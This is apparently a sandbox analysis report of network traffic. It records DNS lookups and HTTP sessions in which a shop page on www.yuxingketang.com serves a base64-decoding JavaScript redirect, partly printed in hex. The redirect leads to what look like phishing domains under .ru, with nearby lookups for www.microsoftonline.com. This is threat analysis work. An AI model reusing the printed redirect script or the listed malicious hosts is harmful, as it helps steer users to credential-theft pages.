                                              Dec 18, 2024 23:42:16.720757961 CET53526081.1.1.1192.168.2.4
                                              Dec 18, 2024 23:42:16.754089117 CET6002553192.168.2.48.8.8.8
                                              Dec 18, 2024 23:42:16.754312992 CET5619753192.168.2.41.1.1.1
                                              Dec 18, 2024 23:42:16.888365030 CET53600258.8.8.8192.168.2.4
                                              Dec 18, 2024 23:42:16.894498110 CET53561971.1.1.1192.168.2.4
                                              Dec 18, 2024 23:42:17.849663019 CET5208753192.168.2.41.1.1.1
                                              Dec 18, 2024 23:42:17.849807978 CET6537853192.168.2.41.1.1.1
                                              Dec 18, 2024 23:42:17.989639044 CET53520871.1.1.1192.168.2.4
                                              Dec 18, 2024 23:42:17.989684105 CET53653781.1.1.1192.168.2.4
                                              Dec 18, 2024 23:42:23.020699978 CET5534553192.168.2.41.1.1.1
                                              Dec 18, 2024 23:42:23.021022081 CET6277353192.168.2.41.1.1.1
                                              Dec 18, 2024 23:42:23.162883997 CET53553451.1.1.1192.168.2.4
                                              Dec 18, 2024 23:42:23.162966967 CET53627731.1.1.1192.168.2.4
                                              Dec 18, 2024 23:42:23.163839102 CET6429853192.168.2.41.1.1.1
                                              Dec 18, 2024 23:42:23.304578066 CET53642981.1.1.1192.168.2.4
                                              Dec 18, 2024 23:42:25.192172050 CET53613951.1.1.1192.168.2.4
                                              Dec 18, 2024 23:42:27.170914888 CET53593881.1.1.1192.168.2.4
                                              Dec 18, 2024 23:42:30.623936892 CET4963053192.168.2.41.1.1.1
                                              Dec 18, 2024 23:42:30.624073982 CET6129453192.168.2.41.1.1.1
                                              Dec 18, 2024 23:42:30.763175964 CET53496301.1.1.1192.168.2.4
                                              Dec 18, 2024 23:42:30.763838053 CET53612941.1.1.1192.168.2.4
                                              Dec 18, 2024 23:42:30.764530897 CET4935153192.168.2.41.1.1.1
                                              Dec 18, 2024 23:42:30.904978037 CET53493511.1.1.1192.168.2.4
                                              Dec 18, 2024 23:42:30.922471046 CET6179253192.168.2.41.1.1.1
                                              Dec 18, 2024 23:42:30.922774076 CET6260353192.168.2.48.8.8.8
                                              Dec 18, 2024 23:42:31.056863070 CET53626038.8.8.8192.168.2.4
                                              Dec 18, 2024 23:42:31.061922073 CET53617921.1.1.1192.168.2.4
                                              TimestampSource IPDest IPChecksumCodeType
                                              Dec 18, 2024 23:41:37.579514980 CET192.168.2.41.1.1.1c20a(Port unreachable)Destination Unreachable
                                              Dec 18, 2024 23:42:25.192246914 CET192.168.2.41.1.1.1c224(Port unreachable)Destination Unreachable
                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Dec 18, 2024 23:41:29.474417925 CET192.168.2.41.1.1.10xb12eStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                              Dec 18, 2024 23:41:29.474488020 CET192.168.2.41.1.1.10x9a57Standard query (0)www.google.com65IN (0x0001)false
                                              Dec 18, 2024 23:41:34.095216990 CET192.168.2.41.1.1.10x45bdStandard query (0)www.yuxingketang.comA (IP address)IN (0x0001)false
                                              Dec 18, 2024 23:41:34.095371008 CET192.168.2.41.1.1.10xe0daStandard query (0)www.yuxingketang.com65IN (0x0001)false
                                              Dec 18, 2024 23:41:37.438590050 CET192.168.2.41.1.1.10xb4b5Standard query (0)www.yuxingketang.comA (IP address)IN (0x0001)false
                                              Dec 18, 2024 23:41:37.438771009 CET192.168.2.41.1.1.10x4f14Standard query (0)www.yuxingketang.com65IN (0x0001)false
                                              Dec 18, 2024 23:41:40.829696894 CET192.168.2.41.1.1.10xaaf3Standard query (0)to.eemjhiulz.ruA (IP address)IN (0x0001)false
                                              Dec 18, 2024 23:41:40.829895973 CET192.168.2.41.1.1.10x7b15Standard query (0)to.eemjhiulz.ru65IN (0x0001)false
                                              Dec 18, 2024 23:41:44.617605925 CET192.168.2.41.1.1.10xefd3Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                              Dec 18, 2024 23:41:44.617741108 CET192.168.2.41.1.1.10x448bStandard query (0)code.jquery.com65IN (0x0001)false
                                              Dec 18, 2024 23:41:44.618068933 CET192.168.2.41.1.1.10xe04Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                              Dec 18, 2024 23:41:44.618189096 CET192.168.2.41.1.1.10x734dStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                              Dec 18, 2024 23:41:44.618769884 CET192.168.2.41.1.1.10x4e97Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                              Dec 18, 2024 23:41:44.618974924 CET192.168.2.41.1.1.10x55c4Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                              Dec 18, 2024 23:41:46.860954046 CET192.168.2.41.1.1.10xbcfbStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                              Dec 18, 2024 23:41:46.861131907 CET192.168.2.41.1.1.10xd30Standard query (0)code.jquery.com65IN (0x0001)false
                                              Dec 18, 2024 23:41:46.862865925 CET192.168.2.41.1.1.10x3032Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                              Dec 18, 2024 23:41:46.863039970 CET192.168.2.41.1.1.10x886aStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                              Dec 18, 2024 23:41:48.421036959 CET192.168.2.41.1.1.10xc8b8Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                              Dec 18, 2024 23:41:48.422405005 CET192.168.2.41.1.1.10x3b70Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                              Dec 18, 2024 23:41:48.451685905 CET192.168.2.41.1.1.10x63bStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                              Dec 18, 2024 23:41:48.451848984 CET192.168.2.41.1.1.10x325cStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                              Dec 18, 2024 23:41:52.895529032 CET192.168.2.41.1.1.10x839Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                              Dec 18, 2024 23:41:52.895703077 CET192.168.2.41.1.1.10xe150Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                              Dec 18, 2024 23:42:12.445812941 CET192.168.2.41.1.1.10x86b9Standard query (0)jcbd2x22nmnzpbhzhkvcbkfhnn7orm5itv63fclxpsluksznwtgigu4oa9fg.ssbvteke.ruA (IP address)IN (0x0001)false
                                              Dec 18, 2024 23:42:12.445934057 CET192.168.2.41.1.1.10x9367Standard query (0)jcbd2x22nmnzpbhzhkvcbkfhnn7orm5itv63fclxpsluksznwtgigu4oa9fg.ssbvteke.ru65IN (0x0001)false
                                              Dec 18, 2024 23:42:16.244482994 CET192.168.2.41.1.1.10xe09aStandard query (0)www.microsoftonline.comA (IP address)IN (0x0001)false
                                              Dec 18, 2024 23:42:16.244676113 CET192.168.2.41.1.1.10x794bStandard query (0)www.microsoftonline.com65IN (0x0001)false
                                              Dec 18, 2024 23:42:16.256088018 CET192.168.2.41.1.1.10xf8cfStandard query (0)jcbd2x22nmnzpbhzhkvcbkfhnn7orm5itv63fclxpsluksznwtgigu4oa9fg.ssbvteke.ruA (IP address)IN (0x0001)false
                                              Dec 18, 2024 23:42:16.256202936 CET192.168.2.41.1.1.10xfed9Standard query (0)jcbd2x22nmnzpbhzhkvcbkfhnn7orm5itv63fclxpsluksznwtgigu4oa9fg.ssbvteke.ru65IN (0x0001)false
                                              Dec 18, 2024 23:42:16.580960989 CET192.168.2.41.1.1.10xa360Standard query (0)www.microsoftonline.comA (IP address)IN (0x0001)false
                                              Dec 18, 2024 23:42:16.754089117 CET192.168.2.48.8.8.80x8f1cStandard query (0)google.comA (IP address)IN (0x0001)false
                                              Dec 18, 2024 23:42:16.754312992 CET192.168.2.41.1.1.10x4993Standard query (0)google.comA (IP address)IN (0x0001)false
                                              Dec 18, 2024 23:42:17.849663019 CET192.168.2.41.1.1.10xd788Standard query (0)www.microsoftonline.comA (IP address)IN (0x0001)false
                                              Dec 18, 2024 23:42:17.849807978 CET192.168.2.41.1.1.10xb491Standard query (0)www.microsoftonline.com65IN (0x0001)false
                                              Dec 18, 2024 23:42:23.020699978 CET192.168.2.41.1.1.10x573aStandard query (0)www.microsoftonline.comA (IP address)IN (0x0001)false
                                              Dec 18, 2024 23:42:23.021022081 CET192.168.2.41.1.1.10x7e4dStandard query (0)www.microsoftonline.com65IN (0x0001)false
                                              Dec 18, 2024 23:42:23.163839102 CET192.168.2.41.1.1.10xdbefStandard query (0)www.microsoftonline.comA (IP address)IN (0x0001)false
                                              Dec 18, 2024 23:42:30.623936892 CET192.168.2.41.1.1.10xe782Standard query (0)www.microsoftonline.comA (IP address)IN (0x0001)false
                                              Dec 18, 2024 23:42:30.624073982 CET192.168.2.41.1.1.10xb147Standard query (0)www.microsoftonline.com65IN (0x0001)false
                                              Dec 18, 2024 23:42:30.764530897 CET192.168.2.41.1.1.10x702cStandard query (0)www.microsoftonline.comA (IP address)IN (0x0001)false
                                              Dec 18, 2024 23:42:30.922471046 CET192.168.2.41.1.1.10x463fStandard query (0)google.comA (IP address)IN (0x0001)false
                                              Dec 18, 2024 23:42:30.922774076 CET192.168.2.48.8.8.80xc151Standard query (0)google.comA (IP address)IN (0x0001)false
                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Dec 18, 2024 23:41:29.613409996 CET1.1.1.1192.168.2.40x9a57No error (0)www.google.com65IN (0x0001)false
                                              Dec 18, 2024 23:41:29.613713026 CET1.1.1.1192.168.2.40xb12eNo error (0)www.google.com142.250.181.132A (IP address)IN (0x0001)false
                                              Dec 18, 2024 23:41:34.331871986 CET1.1.1.1192.168.2.40xe0daNo error (0)www.yuxingketang.com65IN (0x0001)false
                                              Dec 18, 2024 23:41:34.333515882 CET1.1.1.1192.168.2.40x45bdNo error (0)www.yuxingketang.com104.21.17.162A (IP address)IN (0x0001)false
                                              Dec 18, 2024 23:41:34.333515882 CET1.1.1.1192.168.2.40x45bdNo error (0)www.yuxingketang.com172.67.177.169A (IP address)IN (0x0001)false
                                              Dec 18, 2024 23:41:37.578268051 CET1.1.1.1192.168.2.40x4f14No error (0)www.yuxingketang.com65IN (0x0001)false
                                              Dec 18, 2024 23:41:37.579421043 CET1.1.1.1192.168.2.40xb4b5No error (0)www.yuxingketang.com104.21.17.162A (IP address)IN (0x0001)false
                                              Dec 18, 2024 23:41:37.579421043 CET1.1.1.1192.168.2.40xb4b5No error (0)www.yuxingketang.com172.67.177.169A (IP address)IN (0x0001)false
                                              Dec 18, 2024 23:41:41.231903076 CET1.1.1.1192.168.2.40xaaf3No error (0)to.eemjhiulz.ru172.67.166.86A (IP address)IN (0x0001)false
                                              Dec 18, 2024 23:41:41.231903076 CET1.1.1.1192.168.2.40xaaf3No error (0)to.eemjhiulz.ru104.21.34.239A (IP address)IN (0x0001)false
                                              Dec 18, 2024 23:41:41.234044075 CET1.1.1.1192.168.2.40x7b15No error (0)to.eemjhiulz.ru65IN (0x0001)false
                                              Dec 18, 2024 23:41:44.756773949 CET1.1.1.1192.168.2.40xefd3No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                              Dec 18, 2024 23:41:44.756773949 CET1.1.1.1192.168.2.40xefd3No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                              Dec 18, 2024 23:41:44.756773949 CET1.1.1.1192.168.2.40xefd3No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                              Dec 18, 2024 23:41:44.756773949 CET1.1.1.1192.168.2.40xefd3No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                              Dec 18, 2024 23:41:44.757049084 CET1.1.1.1192.168.2.40xe04No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                              Dec 18, 2024 23:41:44.757049084 CET1.1.1.1192.168.2.40xe04No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                              Dec 18, 2024 23:41:44.757330894 CET1.1.1.1192.168.2.40x734dNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                              Dec 18, 2024 23:41:44.758346081 CET1.1.1.1192.168.2.40x4e97No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                              Dec 18, 2024 23:41:44.758346081 CET1.1.1.1192.168.2.40x4e97No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                              Dec 18, 2024 23:41:44.758521080 CET1.1.1.1192.168.2.40x55c4No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                              Dec 18, 2024 23:41:46.999996901 CET1.1.1.1192.168.2.40xbcfbNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                              Dec 18, 2024 23:41:46.999996901 CET1.1.1.1192.168.2.40xbcfbNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                              Dec 18, 2024 23:41:46.999996901 CET1.1.1.1192.168.2.40xbcfbNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                              Dec 18, 2024 23:41:46.999996901 CET1.1.1.1192.168.2.40xbcfbNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                              Dec 18, 2024 23:41:47.001735926 CET1.1.1.1192.168.2.40x886aNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                              Dec 18, 2024 23:41:47.001838923 CET1.1.1.1192.168.2.40x3032No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                              Dec 18, 2024 23:41:47.001838923 CET1.1.1.1192.168.2.40x3032No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                              Dec 18, 2024 23:41:48.561606884 CET1.1.1.1192.168.2.40xc8b8No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                              Dec 18, 2024 23:41:48.561606884 CET1.1.1.1192.168.2.40xc8b8No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                              Dec 18, 2024 23:41:48.563922882 CET1.1.1.1192.168.2.40x3b70No error (0)challenges.cloudflare.com65IN (0x0001)false
                                              Dec 18, 2024 23:41:48.590924978 CET1.1.1.1192.168.2.40x325cNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                              Dec 18, 2024 23:41:48.591981888 CET1.1.1.1192.168.2.40x63bNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                              Dec 18, 2024 23:41:48.591981888 CET1.1.1.1192.168.2.40x63bNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                              Dec 18, 2024 23:41:53.035540104 CET1.1.1.1192.168.2.40x839No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                              Dec 18, 2024 23:42:12.884068012 CET1.1.1.1192.168.2.40x9367No error (0)jcbd2x22nmnzpbhzhkvcbkfhnn7orm5itv63fclxpsluksznwtgigu4oa9fg.ssbvteke.ru65IN (0x0001)false
                                              Dec 18, 2024 23:42:12.884139061 CET1.1.1.1192.168.2.40x86b9No error (0)jcbd2x22nmnzpbhzhkvcbkfhnn7orm5itv63fclxpsluksznwtgigu4oa9fg.ssbvteke.ru172.67.188.29A (IP address)IN (0x0001)false
                                              Dec 18, 2024 23:42:12.884139061 CET1.1.1.1192.168.2.40x86b9No error (0)jcbd2x22nmnzpbhzhkvcbkfhnn7orm5itv63fclxpsluksznwtgigu4oa9fg.ssbvteke.ru104.21.7.246A (IP address)IN (0x0001)false
                                              Dec 18, 2024 23:42:16.399496078 CET1.1.1.1192.168.2.40xfed9No error (0)jcbd2x22nmnzpbhzhkvcbkfhnn7orm5itv63fclxpsluksznwtgigu4oa9fg.ssbvteke.ru65IN (0x0001)false
                                              Dec 18, 2024 23:42:16.400727987 CET1.1.1.1192.168.2.40xf8cfNo error (0)jcbd2x22nmnzpbhzhkvcbkfhnn7orm5itv63fclxpsluksznwtgigu4oa9fg.ssbvteke.ru104.21.7.246A (IP address)IN (0x0001)false
                                              Dec 18, 2024 23:42:16.400727987 CET1.1.1.1192.168.2.40xf8cfNo error (0)jcbd2x22nmnzpbhzhkvcbkfhnn7orm5itv63fclxpsluksznwtgigu4oa9fg.ssbvteke.ru172.67.188.29A (IP address)IN (0x0001)false
                                              Dec 18, 2024 23:42:16.531208038 CET1.1.1.1192.168.2.40x794bNo error (0)www.microsoftonline.commicrosoftonline.comCNAME (Canonical name)IN (0x0001)false
                                              Dec 18, 2024 23:42:16.579843044 CET1.1.1.1192.168.2.40xe09aNo error (0)www.microsoftonline.commicrosoftonline.comCNAME (Canonical name)IN (0x0001)false
                                              Dec 18, 2024 23:42:16.720757961 CET1.1.1.1192.168.2.40xa360No error (0)www.microsoftonline.commicrosoftonline.comCNAME (Canonical name)IN (0x0001)false
                                              Dec 18, 2024 23:42:16.888365030 CET8.8.8.8192.168.2.40x8f1cNo error (0)google.com142.250.181.110A (IP address)IN (0x0001)false
                                              Dec 18, 2024 23:42:16.894498110 CET1.1.1.1192.168.2.40x4993No error (0)google.com172.217.17.78A (IP address)IN (0x0001)false
                                              Dec 18, 2024 23:42:17.989639044 CET1.1.1.1192.168.2.40xd788No error (0)www.microsoftonline.commicrosoftonline.comCNAME (Canonical name)IN (0x0001)false
                                              Dec 18, 2024 23:42:17.989684105 CET1.1.1.1192.168.2.40xb491No error (0)www.microsoftonline.commicrosoftonline.comCNAME (Canonical name)IN (0x0001)false
                                              Dec 18, 2024 23:42:23.162883997 CET1.1.1.1192.168.2.40x573aNo error (0)www.microsoftonline.commicrosoftonline.comCNAME (Canonical name)IN (0x0001)false
                                              Dec 18, 2024 23:42:23.162966967 CET1.1.1.1192.168.2.40x7e4dNo error (0)www.microsoftonline.commicrosoftonline.comCNAME (Canonical name)IN (0x0001)false
                                              Dec 18, 2024 23:42:23.304578066 CET1.1.1.1192.168.2.40xdbefNo error (0)www.microsoftonline.commicrosoftonline.comCNAME (Canonical name)IN (0x0001)false
                                              Dec 18, 2024 23:42:30.763175964 CET1.1.1.1192.168.2.40xe782No error (0)www.microsoftonline.commicrosoftonline.comCNAME (Canonical name)IN (0x0001)false
                                              Dec 18, 2024 23:42:30.763838053 CET1.1.1.1192.168.2.40xb147No error (0)www.microsoftonline.commicrosoftonline.comCNAME (Canonical name)IN (0x0001)false
                                              Dec 18, 2024 23:42:30.904978037 CET1.1.1.1192.168.2.40x702cNo error (0)www.microsoftonline.commicrosoftonline.comCNAME (Canonical name)IN (0x0001)false
                                              Dec 18, 2024 23:42:31.056863070 CET8.8.8.8192.168.2.40xc151No error (0)google.com142.250.181.110A (IP address)IN (0x0001)false
                                              Dec 18, 2024 23:42:31.061922073 CET1.1.1.1192.168.2.40x463fNo error (0)google.com172.217.17.78A (IP address)IN (0x0001)false
                                              • www.yuxingketang.com
                                              • https:
                                                • to.eemjhiulz.ru
                                                • code.jquery.com
                                                • challenges.cloudflare.com
                                                • cdnjs.cloudflare.com
                                                • jcbd2x22nmnzpbhzhkvcbkfhnn7orm5itv63fclxpsluksznwtgigu4oa9fg.ssbvteke.ru
                                              • a.nel.cloudflare.com
                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.449743104.21.17.1624434948C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-18 22:41:36 UTC689OUTGET /collections/throw-blankets HTTP/1.1
                                              Host: www.yuxingketang.com
                                              Connection: keep-alive
                                              Upgrade-Insecure-Requests: 1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: navigate
                                              Sec-Fetch-User: ?1
                                              Sec-Fetch-Dest: document
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              sec-ch-ua-platform: "Windows"
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-12-18 22:41:37 UTC891INHTTP/1.1 301 Moved Permanently
                                              Date: Wed, 18 Dec 2024 22:41:37 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Location: http://www.yuxingketang.com/collections/throw-blankets/
                                              cf-cache-status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hXkFrj%2Fy562CaI2sPhdMebcsMrZfP7wwaOFE0pZ2j7tXXSA7wcHzQNoR%2F8x%2F7T49%2FWCmFwsaGK4v31XKORFTmfmLsyC9iVv3V%2BqAqsLWBbTx2MhcgebdiFgVYcYT%2BNN29sP6RLehng%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8f42a94eacce8ce0-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=1867&min_rtt=1851&rtt_var=706&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1267&delivery_rate=1577525&cwnd=206&unsent_bytes=0&cid=3a01e357cc6c51b8&ts=658&x=0"
                                              2024-12-18 22:41:37 UTC271INData Raw: 31 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 79 75 78 69 6e 67 6b 65 74 61 6e 67 2e 63 6f 6d 2f 63 6f 6c 6c 65 63 74 69 6f 6e 73 2f 74 68 72 6f 77 2d 62 6c 61 6e 6b 65 74 73 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c
                                              Data Ascii: 108<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.yuxingketang.com/collections/throw-blankets/">here</a>.</p><
                                              2024-12-18 22:41:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.449746104.21.17.1624434948C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-18 22:41:40 UTC690OUTGET /collections/throw-blankets/ HTTP/1.1
                                              Host: www.yuxingketang.com
                                              Connection: keep-alive
                                              Upgrade-Insecure-Requests: 1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: navigate
                                              Sec-Fetch-User: ?1
                                              Sec-Fetch-Dest: document
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              sec-ch-ua-platform: "Windows"
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-12-18 22:41:40 UTC797INHTTP/1.1 200 OK
                                              Date: Wed, 18 Dec 2024 22:41:40 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              cf-cache-status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4f8MPqIxpTod1vmcu9byGazszH9rX91kzxZB9DfF59nHcdo%2B%2Fh7bwydRdogC88W5CSAcTCQ5kxQ0S9FcwTruTdgLdC5WhNvvK6RunjWhmU34Zrg7vXJ1rcoij1ua%2BmE0hQa7oK3ERw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8f42a9633af52394-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=1797&min_rtt=1797&rtt_var=898&sent=6&recv=8&lost=0&retrans=1&sent_bytes=4220&recv_bytes=1268&delivery_rate=214437&cwnd=252&unsent_bytes=0&cid=039ead32b04d90de&ts=730&x=0"
                                              2024-12-18 22:41:40 UTC572INData Raw: 34 31 35 0d 0a 3c 73 63 72 69 70 74 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 3e 0a 66 75 6e 63 74 69 6f 6e 20 62 61 73 65 36 34 44 65 63 6f 64 65 55 72 6c 28 73 74 72 29 7b 0a 20 20 20 20 72 65 74 75 72 6e 20 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 61 74 6f 62 28 73 74 72 29 2e 73 70 6c 69 74 28 27 27 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 63 29 20 7b 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 27 25 27 20 2b 20 28 27 30 30 27 20 2b 20 63 2e 63 68 61 72 43 6f 64 65 41 74
                                              Data Ascii: 415<scriptlanguage="javascript"><html lang="en"><head><meta charset="UTF-8"><title>Redirect</title><script>function base64DecodeUrl(str){ return decodeURIComponent(atob(str).split('').map(function(c) { return '%' + ('00' + c.charCodeAt
                                              2024-12-18 22:41:40 UTC480INData Raw: 20 20 20 69 66 20 28 68 61 73 68 2e 69 6e 63 6c 75 64 65 73 28 27 2f 27 29 29 20 7b 0a 20 20 20 20 20 20 20 20 75 72 6c 20 3d 20 62 61 73 65 36 34 44 65 63 6f 64 65 55 72 6c 28 68 61 73 68 2e 73 70 6c 69 74 28 27 2f 27 29 5b 30 5d 29 2b 68 61 73 68 2e 73 70 6c 69 74 28 27 2f 27 29 5b 31 5d 3b 20 2f 2f 20 49 66 20 6e 6f 74 2c 20 74 72 79 20 74 6f 20 62 61 73 65 36 34 20 64 65 63 6f 64 65 20 69 74 0a 20 20 20 20 20 20 20 20 7d 20 65 6c 73 65 20 7b 0a 20 20 20 20 20 20 20 20 75 72 6c 20 3d 20 62 61 73 65 36 34 44 65 63 6f 64 65 55 72 6c 28 68 61 73 68 29 3b 20 2f 2f 20 49 66 20 6e 6f 74 2c 20 74 72 79 20 74 6f 20 62 61 73 65 36 34 20 64 65 63 6f 64 65 20 69 74 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 0a 20 20 20 20 69 66 20 28 75 72 6c 20 26 26 20
                                              Data Ascii: if (hash.includes('/')) { url = base64DecodeUrl(hash.split('/')[0])+hash.split('/')[1]; // If not, try to base64 decode it } else { url = base64DecodeUrl(hash); // If not, try to base64 decode it } } if (url &&
                                              2024-12-18 22:41:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.449752172.67.166.864434948C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-18 22:41:43 UTC692OUTGET /zO7RFNG/ HTTP/1.1
                                              Host: to.eemjhiulz.ru
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              sec-ch-ua-platform: "Windows"
                                              Upgrade-Insecure-Requests: 1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Sec-Fetch-Site: cross-site
                                              Sec-Fetch-Mode: navigate
                                              Sec-Fetch-Dest: document
                                              Referer: https://www.yuxingketang.com/
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-12-18 22:41:44 UTC1248INHTTP/1.1 200 OK
                                              Date: Wed, 18 Dec 2024 22:41:44 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Cache-Control: no-cache, private
                                              cf-cache-status: DYNAMIC
                                              vary: accept-encoding
